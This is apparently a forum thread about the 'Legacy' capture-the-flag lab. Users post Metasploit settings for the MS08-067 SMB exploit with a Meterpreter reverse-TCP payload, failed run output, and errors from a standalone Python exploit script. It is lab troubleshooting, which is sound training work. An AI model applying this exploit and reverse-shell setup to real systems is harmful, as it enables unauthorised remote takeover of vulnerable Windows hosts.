Legacy exploit failed issues

msf6 exploit(windows/smb/ms08_067_netapi) > options

Module options (exploit/windows/smb/ms08_067_netapi):

Name Current Setting Required Description


RHOSTS 10.10.10.4 yes The target host(s), range CIDR identifier, or hosts file with syntax ‘file:’
RPORT 445 yes The SMB service port (TCP)
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)

Payload options (windows/meterpreter/reverse_tcp):

Name Current Setting Required Description


EXITFUNC thread yes Exit technique (Accepted: ‘’, seh, thread, process, none)
LHOST tun0 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port

Exploit target:

Id Name


0 Automatic Targeting

msf6 exploit(windows/smb/ms08_067_netapi) > run

[] Started reverse TCP handler on 10.10.16.192:4444
[-] 10.10.10.4:445 - Exploit failed [unreachable]: Rex::ConnectionTimeout The connection with (10.10.10.4:445) timed out.
[
] Exploit completed, but no session was created.

msf6 exploit(windows/smb/ms08_067_netapi) > uname -a
[*] exec: uname -a

Linux kali 5.10.0-kali9-amd64 #1 SMP Debian 5.10.46-1kali1 (2021-06-25) x86_64 GNU/Linux
msf6 exploit(windows/smb/ms08_067_netapi) >

As you can see my LHOST is set to tun0, and my VM configuration is set to bridged. What am I missing here.

Also, I tried to use the manual expoit for this box.

I download and ran the python script.

┌──(kali㉿kali)-[~/Downloads/ms08_067-master]
└─$ ./ms08_067_2018.py 10.10.10.4 6 4 :gear:
Install the following library to make this script work
Impacket : GitHub - fortra/impacket: Impacket is a collection of Python classes for working with network protocols.
PyCrypto : pycrypto · PyPI

┌──(kali㉿kali)-[~/Downloads/ms08_067-master]

I download and installed both and re ran the script and get the same results.

please assist.

I’m having the same error, were you able to resolve it? @cyberlinux

i’m getting

10.129.1.111:445 - Exploit failed: Rex::Proto::SMB::Execptions::ErrorCode The server responded with error: STATUS_OBJECT_NAME_NOT_FOUND (Command=162 WordCount=0)
Exploit completed, but no session was created

after I reloaded the vm image of kali on a new computer the exploit now works. still was unable to get the manual exploit to work

msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > python3 ms08_067_2018.py
[*] exec: python3 ms08_067_2018.py

File “/home/kali/Downloads/ms08_067-master/ms08_067_2018.py”, line 13
except ImportError, _:
^
SyntaxError: invalid syntax
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > python ms08_067_2018.py
[*] exec: python ms08_067_2018.py

Install the following library to make this script work
Impacket : GitHub - fortra/impacket: Impacket is a collection of Python classes for working with network protocols.
PyCrypto : pycrypto · PyPI
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) >

msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > python2 ms08_067_2018.py
[*] exec: python2 ms08_067_2018.py

Install the following library to make this script work
Impacket : GitHub - fortra/impacket: Impacket is a collection of Python classes for working with network protocols.
PyCrypto : pycrypto · PyPI

Type your comment> @cyberlinux said:

msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > python2 ms08_067_2018.py
[*] exec: python2 ms08_067_2018.py

Install the following library to make this script work
Impacket : GitHub - fortra/impacket: Impacket is a collection of Python classes for working with network protocols.
PyCrypto : pycrypto · PyPI

Thanks, I will try that.

guys can you share how to install these 2 libraries? i cant make em work !